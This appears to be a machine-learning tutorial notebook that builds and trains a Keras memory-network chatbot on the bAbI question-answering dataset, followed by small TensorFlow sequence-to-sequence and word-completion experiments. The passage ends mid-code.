The left part of the previous image shows a single layer of this model. Two different embeddings, A and C, are calculated for each sentence. The query or question q is also embedded, using the B embedding.
The A embeddings m_i are then combined with the question embedding u through an inner product (this is where the attention takes place: by computing the inner product between these embeddings we look for matches between words of the query and words of the sentence, and a softmax over the resulting terms of the dot product then gives more importance to those matches).
Lastly, we compute the output vector o using the C embeddings c_i and the weights or probabilities p_i obtained from the dot product. With this output vector o, the weight matrix W, and the question embedding u, we can finally calculate the predicted answer a-hat.
To build the entire network we just repeat this procedure across the different layers, using the predicted output of one layer as the input of the next. This is shown on the right part of the previous image.
These placeholders have to have the same dimension as the data that will be fed in, and can also have a batch size defined, although we can leave it blank if we don't know it at the time of creating them.
Now we have to create the embeddings mentioned in the paper: A, C and B. An embedding turns an integer (in this case the index of a word) into a d-dimensional vector, where context is taken into account. Word embeddings are widely used in NLP and are one of the techniques that has made the field progress so much in recent years.
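Before wiring this up in Keras, the attention step described above can be sketched in plain numpy. This is only an illustration of the math (p_i = softmax(u · m_i), o = Σ p_i c_i) with made-up random embeddings, not the author's model code:

```python
import numpy as np

rng = np.random.default_rng(0)
num_sentences, d = 5, 4
m = rng.normal(size=(num_sentences, d))  # A-embeddings of the story sentences (m_i)
c = rng.normal(size=(num_sentences, d))  # C-embeddings of the story sentences (c_i)
u = rng.normal(size=d)                   # B-embedding of the question

scores = m @ u                               # inner products: query/sentence matches
p = np.exp(scores) / np.exp(scores).sum()    # softmax -> attention weights p_i
o = (p[:, None] * c).sum(axis=0)             # output o: weighted sum of C-embeddings

print(o.shape)  # o has the same dimensionality as the question embedding u
```

The Keras version does the same thing batched, with `dot` plus a softmax `Activation` layer.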
```
#Create input encoder A:
input_encoder_m = Sequential()
input_encoder_m.add(Embedding(input_dim=vocab_len,output_dim = 64)) #From paper
input_encoder_m.add(Dropout(0.3))
#Outputs: (samples, story_maxlen, embedding_dim) -- gives a list the length of the samples, where each item
#has the max story length and every word is embedded in the embedding dimension
#Create input encoder C:
input_encoder_c = Sequential()
input_encoder_c.add(Embedding(input_dim=vocab_len,output_dim = max_question_len)) #From paper
input_encoder_c.add(Dropout(0.3))
#Outputs: (samples, story_maxlen, max_question_len)
#Create question encoder:
#Create input encoder B:
question_encoder = Sequential()
question_encoder.add(Embedding(input_dim=vocab_len,output_dim = 64,input_length=max_question_len)) #From paper
question_encoder.add(Dropout(0.3))
#Outputs: (samples, question_maxlen, embedding_dim)
#Now lets encode the sequences, passing the placeholders into our encoders:
input_encoded_m = input_encoder_m(input_sequence)
input_encoded_c = input_encoder_c(input_sequence)
question_encoded = question_encoder(question)
```
## ++++++++++++++++++++++++
Once we have created the two embeddings for the input sentences, and the embeddings for the questions, we can start defining the operations that take place in our model. As mentioned previously, we compute the attention by doing the dot product between the embedding of the questions and one of the embeddings of the stories, and then doing a softmax. The following block shows how this is done:
```
#Use dot product to compute similarity between input encoded m and question
#Like in the paper:
match = dot([input_encoded_m,question_encoded], axes = (2,2))
match = Activation('softmax')(match)
```
After this, we need to calculate the output o by adding the match matrix to the second input vector sequence, and then compute the response using this output and the encoded question.
```
#For the response we want to add this match with the output of input_encoded_c
response = add([match,input_encoded_c])
response = Permute((2,1))(response) #Permute Layer: permutes dimensions of input
#Once we have the response we can concatenate it with the question encoded:
answer = concatenate([response, question_encoded])
answer
```
Lastly, once this is done we add the rest of the layers of the model, adding an LSTM layer (instead of an RNN like in the paper), a dropout layer and a final softmax to compute the output.
```
# Reduce the answer tensor with a RNN (LSTM)
answer = LSTM(32)(answer)
#Regularization with dropout:
answer = Dropout(0.5)(answer)
#Output layer:
answer = Dense(vocab_len)(answer) #Output shape: (Samples, Vocab_size) #Yes or no and all 0s
#Now we need to output a probability distribution for the vocab, using softmax:
answer = Activation('softmax')(answer)
```
# The Model !!
Notice here that the output is a vector of the size of the vocabulary (the number of words known by the model), where all the entries should be close to zero except the ones at the indexes of 'yes' and 'no'.
```
#Now we build the final model:
model = Model([input_sequence,question], answer)
model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])
#Categorical instead of binary cross entropy: because of the way we are training,
#we could in principle see any word from the vocab as output;
#however, we should only ever see yes or no
model.summary()
```
With these two lines we build the final model, and compile it, that is, define all the maths that will be going on in the background by specifying an optimiser, a loss function and a metric to optimise.
Now it's time to train the model. Here we need to define the inputs for training (the input stories, questions and answers), the batch size we will feed the model with (how many inputs at once), and the number of epochs to train for (how many times the model will go through the training data in order to update the weights). I used 1000 epochs and obtained an accuracy of 98%, but even with 100 to 200 epochs you should get some pretty good results.
Note that depending on your hardware, this training might take a while. Just relax, sit back, keep reading Medium and wait until it's done.
After training has completed you might be left wondering "am I going to have to wait this long every time I want to use the model?" The obvious answer, my friend, is NO. Keras allows developers to save a trained model, with its weights and all its configuration, and to load it back later; that is exactly what we do further on.
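As a quick sketch of that save/load round trip on a tiny stand-in model (a hypothetical two-layer toy, not the chatbot; the filename `toy_model.h5` is made up):

```python
import numpy as np
from tensorflow.keras.models import Sequential, load_model
from tensorflow.keras.layers import Dense

# a minimal toy model, just to demonstrate the round trip
toy = Sequential([Dense(2, input_shape=(3,))])
toy.compile(optimizer='rmsprop', loss='mse')
toy.save('toy_model.h5')                 # saves weights + architecture + optimizer state

restored = load_model('toy_model.h5')    # returns a compiled, identical model
x = np.zeros((1, 3))
# the restored model produces exactly the same predictions
assert np.allclose(toy.predict(x, verbose=0), restored.predict(x, verbose=0))
```

The same `model.save(...)` / `load_model(...)` pair is used for the real chatbot model below.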
## +++++++++++++++++++++++++++++
```
print( answers_train.shape )
answers_train[0]
val=model.evaluate( [inputs_train, questions_train], answers_train,
batch_size = 32)
print(val)
# Since the answer lands randomly among 38 vocabulary entries, the chance probability is 1/38
#####################################################
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
# probability of a correct random guess is 1/38
##################
```
# +++++++++++++++++++++++++++++++++
<p>
# The numbers here ? They come out probabilistically !
# Let's load previously trained weights into the blank model
Configuring the training process
Before training, we set up how the training will run.
We define the loss function and the optimization method.
In Keras this is done with the compile() function.
Training the model
We train the constructed model on the training set.
In Keras this is done with the fit() function.
Inspecting the training process
While training, we measure the loss and accuracy on the training and validation sets.
We judge how training is going from how loss and accuracy evolve over the epochs.
Evaluating the model
We evaluate the trained model on the prepared test set.
In Keras this is done with the evaluate() function.
Using the model
We obtain the model's output for arbitrary inputs.
In Keras this is done with the predict() function.
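The five steps above can be sketched end to end on a tiny stand-in model (random data and made-up layer sizes, not the chatbot itself):

```python
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense

# toy data: 200 samples, 4 features, binary label
x = np.random.rand(200, 4)
y = (x.sum(axis=1) > 2).astype(int)

demo_model = Sequential([Dense(8, activation='relu', input_shape=(4,)),
                         Dense(1, activation='sigmoid')])
demo_model.compile(optimizer='rmsprop', loss='binary_crossentropy',
                   metrics=['accuracy'])                     # 1. configure training
history = demo_model.fit(x, y, epochs=3, batch_size=32,
                         validation_split=0.2, verbose=0)    # 2. train
print(history.history.keys())                                # 3. inspect the curves
loss, acc = demo_model.evaluate(x, y, verbose=0)             # 4. evaluate
preds = demo_model.predict(x[:3], verbose=0)                 # 5. use
```

The chatbot cells below follow exactly this sequence, just with a bigger model and real data.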
# Load the trained AI brain (model).
```
del model
##################################################
#To load a model that we have already trained and saved:
# Load a model that was trained with batch_size=32 for 350+ epochs
from keras.models import load_model
# returns a compiled model
# identical to the previous one
##################################################
##################################################
model = load_model('./data_out/babi_chatbot_50.h5')
###################################################
###################################################
```
# ===============================
# Let's train it some more !!
# Let's save what it has learned !!
<p>
## Training and testing the model
## Saving the model +++++++++++
## Plot the training metrics with Matplotlib
```
"""
from keras.callbacks import EarlyStopping
early_stopping_callback = EarlyStopping( monitor='val_loss', patience=100)
history = model.fit([inputs_train,questions_train],answers_train,
batch_size = 32, epochs = 150,
validation_data = ([inputs_test,questions_test],answers_test),
callbacks=[early_stopping_callback] )
"""
# The commented-out code above stops training at the onset of overfitting: training accuracy keeps rising while test accuracy stalls
######################################################################################
history = model.fit([inputs_train,questions_train],answers_train,
batch_size = 32, epochs = 5,
validation_data = ([inputs_test,questions_test],answers_test) )
val=model.evaluate( [inputs_train,questions_train], answers_train,
batch_size = 32)
print(val)
######################################
filename = './data_out/babi_chatbot.h5'
model.save(filename)
# Since the answer lands randomly among 38 vocabulary entries, the chance probability is 1/38
########################################
# If model.fit has not been run, 'history' does not exist ==> error
# NameError: name 'history' is not defined
#Lets plot the increase of accuracy as we increase the number of training epochs
#We can see that without any training the acc is about 50%, random guessing
import matplotlib.pyplot as plt
%matplotlib inline
print(history.history.keys())
# summarize history for accuracy
plt.figure(figsize=(12,12))
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
```
# Start of the batch_size = 32, epochs = 50 run
Train on 10000 samples, validate on 1000 samples
Epoch 1/50
10000/10000 [==============================] - 7s 686us/step - loss: 0.8794 - accuracy: 0.5036 - val_loss: 0.6941 - val_accuracy: 0.5030
Epoch 2/50
10000/10000 [==============================] - 6s 570us/step - loss: 0.7019 - accuracy: 0.4998 - val_loss: 0.6937 - val_accuracy: 0.4970
# End of the batch_size = 64, epochs = 50 run
Epoch 48/50
10000/10000 [==============================] - 5s 530us/step - loss: 0.3619 - accuracy: 0.8410 - val_loss: 0.4453 - val_accuracy: 0.7980
Epoch 49/50
10000/10000 [==============================] - 5s 542us/step - loss: 0.3586 - accuracy: 0.8406 - val_loss: 0.4490 - val_accuracy: 0.7950
Epoch 50/50
10000/10000 [==============================] - 5s 547us/step - loss: 0.3553 - accuracy: 0.8424 - val_loss: 0.4508 - val_accuracy: 0.8030
# Result with batch_size = 32, epochs = 50

# Result with batch_size = 32, epochs = 100

## [Problem] Training accuracy keeps rising, but test accuracy has stalled !!
### Understand the concept of over-fitting and explore ways to raise the test accuracy !
<p>
### 1. The data is split into 10,000 training samples and 1,000 test samples. Pool them into 11,000 samples and
### look into rotating k-fold cross validation over them (needed when the amount of data is small)
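A hedged sketch of what exercise 1 asks for, splitting the 11,000 pooled samples into rotating folds with plain numpy index arithmetic (sklearn's `KFold` does the same job); the fold loop body is only indicated:

```python
import numpy as np

n_samples, k = 11000, 5                       # 10,000 train + 1,000 test, pooled
indices = np.random.default_rng(42).permutation(n_samples)
folds = np.array_split(indices, k)            # k disjoint validation folds

scores = []
for i in range(k):
    val_idx = folds[i]                        # this fold is held out for validation
    train_idx = np.concatenate([folds[j] for j in range(k) if j != i])
    # ...here you would vectorize and fit the chatbot on train_idx,
    #    evaluate on val_idx, and append the accuracy to scores...
    scores.append(len(val_idx) / n_samples)   # placeholder for the real score

print(len(folds), sum(len(f) for f in folds))
```

Averaging the k validation scores gives a more stable estimate than a single fixed train/test split.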
<p>
### 2. It may be a limitation of this Keras model. Train with a different number of hidden layers or a different deep-learning algorithm;
### research various other deep-learning algorithms, e.g. on the internet, and apply them to bAbI.
## The current deep-learning model
<pre>
Model: "model_1"
__________________________________________________________________________________________________
Layer (type) Output Shape Param # Connected to
==================================================================================================
input_1 (InputLayer) (None, 156) 0
__________________________________________________________________________________________________
input_2 (InputLayer) (None, 6) 0
__________________________________________________________________________________________________
sequential_1 (Sequential) multiple 2432 input_1[0][0]
__________________________________________________________________________________________________
sequential_3 (Sequential) (None, 6, 64) 2432 input_2[0][0]
__________________________________________________________________________________________________
dot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0]
sequential_3[1][0]
__________________________________________________________________________________________________
activation_1 (Activation) (None, 156, 6) 0 dot_1[0][0]
__________________________________________________________________________________________________
sequential_2 (Sequential) multiple 228 input_1[0][0]
__________________________________________________________________________________________________
add_1 (Add) (None, 156, 6) 0 activation_1[0][0]
sequential_2[1][0]
__________________________________________________________________________________________________
permute_1 (Permute) (None, 6, 156) 0 add_1[0][0]
__________________________________________________________________________________________________
concatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0]
sequential_3[1][0]
__________________________________________________________________________________________________
lstm_1 (LSTM) (None, 32) 32384 concatenate_1[0][0]
__________________________________________________________________________________________________
dropout_4 (Dropout) (None, 32) 0 lstm_1[0][0]
__________________________________________________________________________________________________
dense_1 (Dense) (None, 38) 1254 dropout_4[0][0]
__________________________________________________________________________________________________
activation_2 (Activation) (None, 38) 0 dense_1[0][0]
==================================================================================================
Total params: 38,730
Trainable params: 38,730
Non-trainable params: 0
__________________________________________________________________________________________________
</pre>
## ==========================================
# Evaluate the trained AI brain model !!!!
# ===================================
```
# model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])
# print( answers_train.shape ) ==> ( 10000, 38 ) one hot vector
### We evaluate on the train set //////// how does this differ from evaluating on the test data ?? ///////
val=model.evaluate( [inputs_train,questions_train], answers_train, batch_size = 32)
###################################################################################
val
# 0.88 at epoch 50
```
## ==========================================
# Pose questions to test the trained AI brain !!!!
# ====================================
```
#Lets check out the predictions on the test set:
#These are just probabilities for every single word on the vocab
# prediction based on the test data ##############################
pred_results = model.predict(([inputs_test,questions_test]))
print( pred_results )
```
These results are an array that, as mentioned earlier, contains in every position the probability of each word in the vocabulary being the answer to the question. If we look at the first element of this array, we see a vector of the size of the vocabulary, where all the entries are close to 0 except the ones corresponding to yes or no.
Out of these, if we pick the index of the highest value in the array and look up the word it corresponds to, we find out whether the answer is affirmative or negative.
One fun thing we can do now is create our own stories and questions, and feed them to the bot to see what it says!
```
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
# probability of a correct random guess is 1/38
# 0.579 at 50 epochs
# 0.69 at 100 epochs
# 0.54 at 150 epochs
#These are the probabilities for the vocab words using the 1st sentence
pred_results[0]
val_max = np.argmax(pred_results[0])
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(k)
#See probability:
pred_results[0][val_max]
```
# ================================
```
#Now, we can make our own questions using the vocabulary we have
print( len(vocab) )
vocab
# 'office': 1
# '?': 37 == the last index
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_story.split()
```
```
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
```
```
my_question = 'Sandra got the milk ?'
my_question.split()
#Put the data in the same format as before
my_data = [(my_story.split(), my_question.split(),'yes')]
#Vectorize this data
my_story, my_ques, my_ans = vectorize_stories(my_data)
#Make the prediction
pred_results = model.predict(([my_story,my_ques]))
print( pred_results.shape )
print( 'yes : ', pred_results[0][26] )
print( 'no : ', pred_results[0][37] )
print( pred_results[0][26]/ pred_results[0][37] )
# at 50 epochs yes / no = 0.986, i.e. almost equal probabilities
```
```
'yes': 24,
'left': 25,
'to': 26,
'milk': 27,
'in': 28,
'moved': 29,
'discarded': 30,
'no': 31,
```
```
val_max = np.argmax(pred_results[0])
print( val_max )
#Correct prediction!
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(val)
print(k)
#Confidence
pred_results[0][val_max]
```
# ====================================
```
my_story = 'Sandra picked up the milk . Sandra moved to the bathroom . '
my_question = 'Is the milk in the bathroom ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
###############################
# 0.9748 at 50 epochs
# 0.974858 at 100 epochs
# 0.6165 at 150 epochs
model.evaluate([inputs_train,questions_train],answers_train,
batch_size = 32)
val_max = np.argmax(pred_results[0])
print( val_max )
#Correct prediction!
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(val)
print(k)
```
# ====================================
<p>
The complete code, collected on one page
```
import keras
from keras.models import Sequential, Model
from keras.layers.embeddings import Embedding
from keras.layers import Permute, dot, add, concatenate
from keras.layers import LSTM, Dense, Dropout, Input, Activation
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from functools import reduce
import tarfile
import numpy as np
import re
import IPython
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
def tokenize(sent):
return [ x.strip() for x in re.split(r'(\W+)+', sent) if x.strip()]
def parse_stories(lines):
'''Parse stories provided in the bAbi tasks format
'''
data = []
story = []
for line in lines:
line = line.decode('utf-8').strip()
nid, line = line.split(' ', 1)
nid = int(nid)
if nid == 1:
story = []
if '\t' in line:
q, a, supporting = line.split('\t')
q = tokenize(q)
# Provide all the substories
substory = [x for x in story if x]
data.append((substory, q, a))
story.append('')
else:
sent = tokenize(line)
story.append(sent)
return data
def get_stories(f):
data = parse_stories(f.readlines())
flatten = lambda data: reduce(lambda x, y: x + y, data)
data = [(flatten(story), q, answer) for story, q, answer in data]
return data
def vectorize_stories(data, word_idx, story_maxlen, query_maxlen):
X = []
Xq = []
Y = []
for story, query, answer in data:
x = [word_idx[w] for w in story]
xq = [word_idx[w] for w in query]
# let's not forget that index 0 is reserved
y = np.zeros(len(word_idx) + 1)
y[word_idx[answer]] = 1
X.append(x)
Xq.append(xq)
Y.append(y)
return (pad_sequences(X, maxlen=story_maxlen),
pad_sequences(Xq, maxlen=query_maxlen), np.array(Y))
class TrainingVisualizer(keras.callbacks.History):
def on_epoch_end(self, epoch, logs={}):
super().on_epoch_end(epoch, logs)
IPython.display.clear_output(wait=True)
pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('loss')}).plot()
axes = pd.DataFrame({key: value for key, value in self.history.items() if key.endswith(('acc', 'accuracy'))}).plot()
axes.set_ylim([0, 1])
plt.show()
try:
path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')
except:
print('Error downloading dataset, please download it manually:\n'
'$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\n'
'$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')
raise
tar = tarfile.open(path)
challenge = 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt'
print('Extracting stories for the challenge: single_supporting_fact_10k')
train_stories = get_stories(tar.extractfile(challenge.format('train')))
test_stories = get_stories(tar.extractfile(challenge.format('test')))
print( len(train_stories), len(test_stories) )
print('Number of training stories:', len(train_stories))
print('Number of test stories:', len(test_stories))
print( train_stories[0] )
vocab = set()
for story, q, answer in train_stories + test_stories:
vocab |= set(story + q + [answer])
vocab = sorted(vocab)
# Reserve 0 for masking via pad_sequences
vocab_size = len(vocab) + 1
story_maxlen = max(map(len, (x for x, _, _ in train_stories + test_stories)))
query_maxlen = max(map(len, (x for _, x, _ in train_stories + test_stories)))
word_idx = dict((c, i + 1) for i, c in enumerate(vocab))
idx_word = dict((i+1, c) for i,c in enumerate(vocab))
inputs_train, queries_train, answers_train = vectorize_stories(train_stories,
word_idx,
story_maxlen,
query_maxlen)
inputs_test, queries_test, answers_test = vectorize_stories(test_stories,
word_idx,
story_maxlen,
query_maxlen)
print('-------------------------')
print('Vocabulary:\n',vocab,"\n")
print('Vocab size:', vocab_size, 'unique words')
print('Story max length:', story_maxlen, 'words')
print('Query max length:', query_maxlen, 'words')
print('Number of training stories:', len(train_stories))
print('Number of test stories:', len(test_stories))
print('-------------------------')
print('-------------------------')
print('inputs: integer tensor of shape (samples, max_length)')
print('inputs_train shape:', inputs_train.shape)
print('inputs_test shape:', inputs_test.shape)
print('input train sample', inputs_train[0,:])
print('-------------------------')
print('-------------------------')
print('queries: integer tensor of shape (samples, max_length)')
print('queries_train shape:', queries_train.shape)
print('queries_test shape:', queries_test.shape)
print('query train sample', queries_train[0,:])
print('-------------------------')
print('answers: binary (1 or 0) tensor of shape (samples, vocab_size)')
print('answers_train shape:', answers_train.shape)
print('answers_test shape:', answers_test.shape)
print('answer train sample', answers_train[0,:])
print('-------------------------')
train_epochs = 100
batch_size = 32
lstm_size = 64
embed_size = 50
dropout_rate = 0.3
# placeholders
input_sequence = Input((story_maxlen,))
question = Input((query_maxlen,))
print('Input sequence:', input_sequence)
print('Question:', question)
# encoders
# embed the input sequence into a sequence of vectors
input_encoder_m = Sequential()
input_encoder_m.add(Embedding(input_dim=vocab_size,
output_dim=embed_size))
input_encoder_m.add(Dropout(dropout_rate))
# output: (samples, story_maxlen, embedding_dim)
# embed the input into a sequence of vectors of size query_maxlen
input_encoder_c = Sequential()
input_encoder_c.add(Embedding(input_dim=vocab_size,
output_dim=query_maxlen))
input_encoder_c.add(Dropout(dropout_rate))
# output: (samples, story_maxlen, query_maxlen)
# embed the question into a sequence of vectors
question_encoder = Sequential()
question_encoder.add(Embedding(input_dim=vocab_size,
output_dim=embed_size,
input_length=query_maxlen))
question_encoder.add(Dropout(dropout_rate))
# output: (samples, query_maxlen, embedding_dim)
# encode input sequence and questions (which are indices)
# to sequences of dense vectors
input_encoded_m = input_encoder_m(input_sequence)
print('Input encoded m', input_encoded_m)
input_encoded_c = input_encoder_c(input_sequence)
print('Input encoded c', input_encoded_c)
question_encoded = question_encoder(question)
print('Question encoded', question_encoded)
# compute a 'match' between the first input vector sequence
# and the question vector sequence
# shape: `(samples, story_maxlen, query_maxlen)
match = dot([input_encoded_m, question_encoded], axes=-1, normalize=False)
print(match.shape)
match = Activation('softmax')(match)
print('Match shape', match.shape)
# add the match matrix with the second input vector sequence
response = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)
response = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)
print('Response shape', response)
# concatenate the response vector with the question vector sequence
answer = concatenate([response, question_encoded])
print('Answer shape', answer)
answer = LSTM(lstm_size)(answer) # Generate tensors of shape 32
answer = Dropout(dropout_rate)(answer)
answer = Dense(vocab_size)(answer) # (samples, vocab_size)
# we output a probability distribution over the vocabulary
answer = Activation('softmax')(answer)
# build the final model
model = Model([input_sequence, question], answer)
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
metrics=['accuracy'])
model.summary()
model.fit([inputs_train, queries_train], answers_train, batch_size, train_epochs, callbacks=[TrainingVisualizer()],
validation_data=([inputs_test, queries_test], answers_test))
model.save('model.h5')
for i in range(0,10):
current_inp = test_stories[i]
current_story, current_query, current_answer = vectorize_stories([current_inp], word_idx, story_maxlen, query_maxlen)
current_prediction = model.predict([current_story, current_query])
current_prediction = idx_word[np.argmax(current_prediction)]
print(' '.join(current_inp[0]), ' '.join(current_inp[1]), '| Prediction:', current_prediction, '| Ground Truth:', current_inp[2])
print("-----------------------------------------------------------------------------------------")
# print('-------------------------------------------------------------------------------------------')
# print('Custom User Queries (Make sure there are spaces before each word)')
# while 1:
# print('-------------------------------------------------------------------------------------------')
# print('Please input a story')
# user_story_inp = input().split(' ')
# print('Please input a query')
# user_query_inp = input().split(' ')
# user_story, user_query, user_ans = vectorize_stories([[user_story_inp, user_query_inp, '.']], word_idx, story_maxlen, query_maxlen)
# user_prediction = model.predict([user_story, user_query])
# user_prediction = idx_word[np.argmax(user_prediction)]
# print('Result')
# print(' '.join(user_story_inp), ' '.join(user_query_inp), '| Prediction:', user_prediction)
# Mary went to the bathroom . John moved to the hallway . Mary travelled to the office . # Where is Mary ?
# Sandra travelled to the office . John journeyed to the garden .
```
# ====================================
<p>
# [Idea] Translate the English data into Korean with a machine translator.
<p>
# [Idea] Build a Korean QA system from a Korean-language bAbI dataset.
<p>
# [Idea] Build one from math-tutoring question-and-answer data.
<p>
# Web version, attention version
# https://github.com/vinhkhuc/MemN2N-babi-python
# ++++++++++++++++++++++++++++++++++
<p>
# A sequence-to-sequence experiment
<p>

```
import tensorflow.compat.v1 as tf
tf.disable_eager_execution()
import numpy as np
char_arr = [c for c in "SEPabcdefghijklmnopqrstuvwxyz단어나무놀이소녀키스사랑봉구우루"]
num_dic = {n: i for i, n in enumerate(char_arr)}
dic_len = len(num_dic)
seq_data = [['word', "단어"], ["wood", "나무"], ["game", "놀이"], ["girl", "소녀"],
["kiss", "키스"], ["love", "사랑"], ["bong", "봉구"], ["uruu", "우루"]]
def make_batch(seq_data):
input_batch = []
output_batch = []
target_batch = []
for seq in seq_data:
input = [num_dic[n] for n in seq[0]]
output = [num_dic[n] for n in ("S" + seq[1])]
target = [num_dic[n] for n in (seq[1] + "E")]
input_batch.append(np.eye(dic_len)[input])
output_batch.append(np.eye(dic_len)[output])
target_batch.append(target)
return input_batch, output_batch, target_batch
learning_rate = 0.001
n_hidden = 128
total_epoch = 1000
n_class = n_input = dic_len
enc_input = tf.placeholder(tf.float32, [None, None, n_input])
dec_input = tf.placeholder(tf.float32, [None, None, n_input])
targets = tf.placeholder(tf.int64, [None, None])
# encoder: [batch size, time steps, input size]
# decoder: [batch size, time steps]
with tf.variable_scope("encode"):
enc_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)
enc_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)
outputs, enc_states = tf.nn.dynamic_rnn(enc_cell, enc_input, dtype=tf.float32)
with tf.variable_scope("decode"):
dec_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)
dec_cell = tf.nn.rnn_cell.DropoutWrapper(dec_cell, output_keep_prob=0.5)
outputs, dec_stats = tf.nn.dynamic_rnn(dec_cell, dec_input,
initial_state=enc_states, dtype=tf.float32)
model = tf.layers.dense(outputs, n_class, activation=None)
cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=model, labels=targets
)
)
opt = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
input_batch, output_batch, target_batch = make_batch(seq_data)
cost_val = []
for epoch in range(total_epoch):
_, loss = sess.run([opt, cost], feed_dict={enc_input: input_batch,
dec_input: output_batch,
targets: target_batch})
cost_val.append(loss)
if (epoch+1) % 200 ==0:
print("Epoch: {:04d}, cost: {}".format(epoch+1, loss))
print("\noptimization complete")
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams["axes.unicode_minus"] = False
plt.figure(figsize=(20, 10))
plt.title("cost")
plt.plot(cost_val, linewidth=1, alpha=0.8)
plt.show()
def translate(word):
seq_data = [word, "P" * len(word)]
input_batch, output_batch, target_batch = make_batch([seq_data])
prediction = tf.argmax(model, 2)
result = sess.run(prediction, feed_dict={enc_input: input_batch,
dec_input: output_batch,
targets: target_batch})
decoded = [char_arr[i] for i in result[0]]
try:
end = decoded.index("E")
translated = "".join(decoded[:end])
return translated
    except ValueError:
        # no "E" end token was predicted; fall back to the full decoded string
        return "".join(decoded)
print("\n ==== translate test ====")
print("word -> {}".format(translate("word")))
print("wodr -> {}".format(translate("wodr")))
print("love -> {}".format(translate("love")))
print("loev -> {}".format(translate("loev")))
print("bogn -> {}".format(translate("bogn")))
print("uruu -> {}".format(translate("uruu")))
print("abcd -> {}".format(translate("abcd")))
```
# Automatic word completion !! (3 letters ==> a 4-letter word)

```
import tensorflow.compat.v1 as tf
tf.disable_eager_execution()  # required for the placeholder-based TF1 graph code below
import numpy as np
char_arr = ["a", "b", "c", "d", "e", "f", "g",
"h", "i", "j", "k", "l", "m", "n",
"o", "p", "q", "r", "s", "t", "u",
"v", "w", "x", "y", "z"]
num_dic = {n: i for i, n in enumerate(char_arr)}
dic_len = len(num_dic)
seq_data = ["word", "wood", "deep", "dive", "cold", "cool", "load", "love", "kiss", "kind"]
def make_batch(seq_data):
input_batch = []
target_batch = []
for seq in seq_data:
input = [num_dic[n] for n in seq[:-1]]
target = num_dic[seq[-1]]
input_batch.append(np.eye(dic_len)[input])
target_batch.append(target)
return input_batch, target_batch
learning_rate = 0.001
n_hidden = 128
total_epoch = 10000
n_step = 3
n_input = n_class = dic_len
X = tf.placeholder(tf.float32, [None, n_step, n_input], name="input_X")
Y = tf.placeholder(tf.int32, [None])
W = tf.Variable(tf.random_normal([n_hidden, n_class]))
b = tf.Variable(tf.random_normal([n_class]))
cell1 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)
cell1 = tf.nn.rnn_cell.DropoutWrapper(cell1, output_keep_prob=0.5)
cell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)
# stack the two LSTM cells into one with MultiRNNCell
multi_cell = tf.nn.rnn_cell.MultiRNNCell([cell1, cell2])
outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)
outputs = tf.transpose(outputs, [1, 0, 2])
outputs = outputs[-1]
model = tf.matmul(outputs, W) + b
cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model, labels=Y)
)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
input_batch, output_batch = make_batch(seq_data)
cost_epoch = []
for epoch in range(total_epoch):
_, loss = sess.run([opt, cost], feed_dict={X: input_batch, Y: output_batch})
cost_epoch.append(loss)
    if (epoch+1) % 2000 == 0:
        print("Epoch: {:04d}, cost: {}".format(epoch+1, loss))
print("\noptimization complete")
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams["axes.unicode_minus"] = False
plt.figure(figsize=(20,6))
plt.title("cost")
